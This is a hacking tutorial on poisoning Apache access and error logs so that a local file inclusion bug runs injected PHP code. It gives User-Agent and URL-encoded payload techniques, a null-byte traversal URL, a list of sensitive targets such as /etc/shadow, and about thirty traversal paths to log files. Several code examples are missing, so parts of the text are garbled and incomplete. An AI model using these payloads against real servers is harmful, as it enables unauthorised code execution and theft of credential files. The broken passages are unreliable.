LFI Apache log poisoning

  • LFI Apache Log Poisoning by Ausome1
    
    Here's a quick overview:
    
    If you find a file inclusion vuln and you can't do a remote file include (RFI) attack on it but you can still use the LFI to view things outside the /home/$user directory (open_base turned off). What you can do to include some PHP code for you to execute on the server is to poison some logs. Apache is a good one to do.
    
    There are 2 files for Apache we can try to attack, the access_log and the error_log. To attack the Apache access log we can install the Firefox extension User Agent Switcher. What we do is put some php code in our user agent like so:
    
    
    
    or another example 
    
    Now set FF to use that php_info User Agent you just made and visit the web page. Apache has now added your user agent string to the access_log.
    
    Now we need to find where these Apache log files are located, and use our LFI to go to them, ex:
    
    http://example_site.com/index.php?view=../../../../../../etc/httpd/logs/access_log%00
    
    This will inlcude the log and execute your php code.
    
    As a FYI you can not use double quotes and backslashes in your UA, it messes up the Apache access log and you just get a parse error.
    
    So do something like, in your UA:
    
    ');?>
    
    Single quotes are fine. and array indexes without quotes are fine use $_GET[cmd] instead of $_GET['cmd'];
    
    Now there is a downside to attacking the access_log. On busy sites they tend to get big. If the file is to big, your php script will time out.
    
    So you may have to wait till the logs rotate on Sunday nights (usually) and attack then. 
    
    Or you can try the Apache error_log, they tend to be smaller.
    
    How to attack the error_log:
    
    This one we don't use the User Agent, we can get php code into the log via the url
    
    What we do is cause a 404 with our php code:
    
    http://example_site.com/%3C%3Fphp%20phpinfo%28%29%3B%3F%3E   <== url encoded 
    
    You have to urlencode your php because of the ? Apache think everything after it is the query string and drops it.
    
    Now that we have poisoned the error_log we can LFI to it and include our PHP code.
    
    I like to use the FireFox extension hackbar for this one. You can write your php code, highlight it, and click urlencode, then execute.
    
    Also, Apache error logs aren't the only things you can attack. Other programs have log files as well, and also you if a website stores user input into a session variable that is stored on the hard drive. You can LFI to the session file and include that.
    
    Here is a couple of places that may be interesting to "visit" with your LFI:
    
    /etc/passwd
    /etc/shadow
    /etc/group
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits
    /usr/lib/security/mkuser.default
    
    Possible log locations:
    
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log
    
    Also, looking in the httpd.conf file might give the location of the log files if they are using custom names.